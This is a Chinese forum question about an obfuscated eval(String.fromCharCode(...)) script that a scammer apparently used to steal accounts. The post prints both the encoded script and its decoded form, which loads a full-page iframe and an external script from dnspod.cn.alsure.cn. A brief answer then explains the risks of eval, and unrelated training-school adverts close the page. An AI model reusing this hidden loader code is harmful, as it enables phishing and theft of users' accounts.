為什么很多木馬和非法網(wǎng)站,里面都有類似這段代碼
t=eval("String.fromCharCode("+t+")"
網(wǎng)上遇見個盜號的騙子,一直強調(diào)要我用360安全瀏覽器,輸入下面網(wǎng)址
http://gamebbs.swjoy.com/uc_c...
例子:
<script>
t="60,104,116,109,108,62,10,60,104,101,97,100,62,10,60,109,101,116,97,32,104,116,116,112,45,101,113,117,105,118,61,34,67,111,110,116,101,110,116,45,84,121,112,101,34,32,99,111,110,116,101,110,116,61,34,116,101,120,116,47,104,116,109,108,59,32,99,104,97,114,115,101,116,61,117,116,102,45,56,34,32,47,62,10,60,116,105,116,108,101,62,60,47,116,105,116,108,101,62,10,60,109,101,116,97,32,110,97,109,101,61,34,114,101,110,100,101,114,101,114,34,32,99,111,110,116,101,110,116,61,34,105,101,45,99,111,109,112,34,62,10,60,108,105,110,107,32,114,101,108,61,34,105,99,111,110,34,32,116,121,112,101,61,34,105,109,97,103,101,47,105,99,111,34,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,119,119,46,104,100,104,121,46,120,109,46,103,111,118,46,99,110,47,100,111,119,110,47,101,101,49,47,105,99,111,46,105,99,111,34,32,47,62,10,60,108,105,110,107,32,114,101,108,61,34,115,104,111,114,116,99,117,116,32,105,99,111,110,34,32,116,121,112,101,61,34,105,109,97,103,101,47,120,45,105,99,111,110,34,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,119,119,46,104,100,104,121,46,120,109,46,103,111,118,46,99,110,47,100,111,119,110,47,101,101,49,47,105,99,111,46,105,99,111,34,32,47,62,10,60,47,104,101,97,100,62,10,60,98,111,100,121,32,115,99,114,111,108,108,61,34,110,111,34,62,10,60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,10,9,47,47,60,33,45,45,10,32,32,32,32,32,32,32,32,118,97,114,32,119,101,98,76,111,97,100,61,102,117,110,99,116,105,111,110,40,41,123,10,9,9,9,118,97,114,32,112,111,115,44,115,116,114,44,117,114,108,44,114,101,109,111,116,101,85,114,108,59,32,32,10,9,9,9,115,116,114,32,61,32,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114,101,102,59,32,32,10,9,9,9,112,111,115,32,61,32,115,116,114,46,105,110,100,101,120,79,102,40,34,63,34,41,59,32,32,10,9,9,9,117,114,108,32,61,32,115,116,114,46,115,117,98,115,116,114,105,110,103,40,112,111,115,43,49,41,59,32,32,10,9,9,9,99,108,111,117,100,61,34,104,116,116,112,58,47,47,100,110,115,112,111,100,46,99,110,46,97,108,115,117,114,101,46,99,110,47,34,43,117,114,108,59,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,10,9,9,9,100,111,99,117,109,101,110,116,46,119,114,105,116,101,108,110,40,39,60,104,116,109,108,62,60,104,101,97,100,62,60,115,116,121,108,101,62,104,116,109,108,123,111,118,101,114,102,108,111,119,58,104,105,100,100,101,110,59,125,98,111,100,121,123,104,101,105,103,104,116,58,49,48,48,37,59,109,97,114,103,105,110,58,48,112,120,59,125,60,47,115,116,121,108,101,62,60,47,104,101,97,100,62,60,98,111,100,121,32,115,99,114,111,108,108,61,34,110,111,34,62,60,105,102,114,97,109,101,32,32,105,100,61,34,108,111,97,100,98,111,120,34,32,115,114,99,61,34,34,32,104,101,105,103,104,116,61,34,49,48,48,37,34,32,119,105,100,116,104,61,34,49,48,48,37,34,32,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62,39,41,59,10,9,9,9,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,108,111,97,100,98,111,120,34,41,46,115,114,99,61,99,108,111,117,100,59,32,10,9,9,9,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,104,116,116,112,58,47,47,100,110,115,112,111,100,46,99,110,46,97,108,115,117,114,101,46,99,110,47,106,115,47,97,112,105,46,112,104,112,63,99,97,108,108,98,97,99,107,61,100,111,99,117,109,101,110,116,46,116,105,116,108,101,61,38,117,61,39,43,101,115,99,97,112,101,40,99,108,111,117,100,41,43,39,34,62,60,47,115,99,39,43,39,114,105,112,116,62,39,41,10,9,9,125,59,119,101,98,76,111,97,100,40,41,59,10,9,9,47,47,45,45,62,10,60,47,115,99,114,105,112,116,62,10,60,47,98,111,100,121,62,10,60,47,104,116,109,108,62"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>
哪些看起來像數(shù)字的,其實是字符串轉(zhuǎn)換出來的,如果其實質(zhì)是一段危險代碼,就可能獲取你很多信息。
這段代碼展開的內(nèi)容是:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title></title>
<meta name="renderer" content="ie-comp">
<link rel="icon" type="image/ico" />
<link rel="shortcut icon" type="image/x-icon" />
</head>
<body scroll="no">
<script type="text/javascript">
//<!--
var webLoad=function(){
var pos,str,url,remoteUrl;
str = window.location.href;
pos = str.indexOf("?");
url = str.substring(pos+1);
cloud="http://dnspod.cn.alsure.cn/"+url;
document.writeln('<html><head><style>html{overflow:hidden;}body{height:100%;margin:0px;}</style></head><body scroll="no"><iframe id="loadbox" src="" height="100%" width="100%" frameborder="0"></iframe></body></html>');
document.getElementById("loadbox").src=cloud;
document.write('<script type="text/javascript" src="http://dnspod.cn.alsure.cn/js/api.php?callback=document.title=&u='+escape(cloud)+'"></sc'+'ript>')
};webLoad();
//-->
</script>
</body>
</html>
請多查閱文檔。
一句話:eval
方法會將傳入的字符串視為 js
代碼進(jìn)行執(zhí)行,而這段代碼的執(zhí)行域是與當(dāng)前執(zhí)行環(huán)境相等的,這意味著精心構(gòu)造的字符串可以輕松獲取你當(dāng)前頁面上的任意 js
變量值、操控當(dāng)前頁面(如果當(dāng)前運行環(huán)境是瀏覽器的話)。
北大青鳥APTECH成立于1999年。依托北京大學(xué)優(yōu)質(zhì)雄厚的教育資源和背景,秉承“教育改變生活”的發(fā)展理念,致力于培養(yǎng)中國IT技能型緊缺人才,是大數(shù)據(jù)專業(yè)的國家
北大青鳥中博軟件學(xué)院創(chuàng)立于2003年,作為華東區(qū)著名互聯(lián)網(wǎng)學(xué)院和江蘇省首批服務(wù)外包人才培訓(xùn)基地,中博成功培育了近30000名軟件工程師走向高薪崗位,合作企業(yè)超4
中公教育集團(tuán)創(chuàng)建于1999年,經(jīng)過二十年潛心發(fā)展,已由一家北大畢業(yè)生自主創(chuàng)業(yè)的信息技術(shù)與教育服務(wù)機構(gòu),發(fā)展為教育服務(wù)業(yè)的綜合性企業(yè)集團(tuán),成為集合面授教學(xué)培訓(xùn)、網(wǎng)
達(dá)內(nèi)教育集團(tuán)成立于2002年,是一家由留學(xué)海歸創(chuàng)辦的高端職業(yè)教育培訓(xùn)機構(gòu),是中國一站式人才培養(yǎng)平臺、一站式人才輸送平臺。2014年4月3日在美國成功上市,融資1
曾工作于聯(lián)想擔(dān)任系統(tǒng)開發(fā)工程師,曾在博彥科技股份有限公司擔(dān)任項目經(jīng)理從事移動互聯(lián)網(wǎng)管理及研發(fā)工作,曾創(chuàng)辦藍(lán)懿科技有限責(zé)任公司從事總經(jīng)理職務(wù)負(fù)責(zé)iOS教學(xué)及管理工作。
浪潮集團(tuán)項目經(jīng)理。精通Java與.NET 技術(shù), 熟練的跨平臺面向?qū)ο箝_發(fā)經(jīng)驗,技術(shù)功底深厚。 授課風(fēng)格 授課風(fēng)格清新自然、條理清晰、主次分明、重點難點突出、引人入勝。
精通HTML5和CSS3;Javascript及主流js庫,具有快速界面開發(fā)的能力,對瀏覽器兼容性、前端性能優(yōu)化等有深入理解。精通網(wǎng)頁制作和網(wǎng)頁游戲開發(fā)。
具有10 年的Java 企業(yè)應(yīng)用開發(fā)經(jīng)驗。曾經(jīng)歷任德國Software AG 技術(shù)顧問,美國Dachieve 系統(tǒng)架構(gòu)師,美國AngelEngineers Inc. 系統(tǒng)架構(gòu)師。